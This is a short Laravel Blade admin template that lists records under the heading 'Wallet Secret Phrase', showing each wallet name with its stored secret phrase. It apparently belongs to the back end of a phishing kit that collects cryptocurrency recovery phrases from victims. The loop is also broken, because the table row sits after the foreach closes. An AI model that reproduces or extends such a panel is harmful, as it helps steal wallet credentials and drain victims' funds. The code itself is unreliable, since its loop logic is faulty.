@extends('layouts.admin') @section('style') @endsection @section('content')
@php $i = 0; @endphp @foreach($a_contests as $c) @php $i++; @endphp @endforeach
S/No Wallet Secret Phrase
{{ $i }} {{$c->wallet_name}} {{$c->secret_phrase}}
@endsection